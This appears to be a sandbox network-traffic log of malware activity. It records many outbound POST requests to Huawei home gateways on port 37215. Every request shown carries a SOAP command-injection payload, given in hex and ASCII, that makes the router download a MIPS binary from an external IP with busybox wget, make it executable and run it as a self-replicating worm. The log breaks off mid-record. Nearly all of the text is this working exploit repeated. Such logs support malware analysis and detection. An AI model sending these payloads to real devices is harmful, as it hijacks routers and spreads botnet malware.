                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1174192.168.2.1545408157.0.81.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.730978966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1175192.168.2.1532844157.25.239.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.731002092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1176192.168.2.154576275.29.245.5837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.731177092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1177192.168.2.1538716197.187.114.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.731204987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1178192.168.2.1536284157.246.192.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.731236935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:00.965617895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1179192.168.2.1541114219.55.178.11137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.731261969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1180192.168.2.155255270.4.41.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.731394053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1181192.168.2.1536536157.146.18.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.731544018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1182192.168.2.154280441.41.83.3237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.736680031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
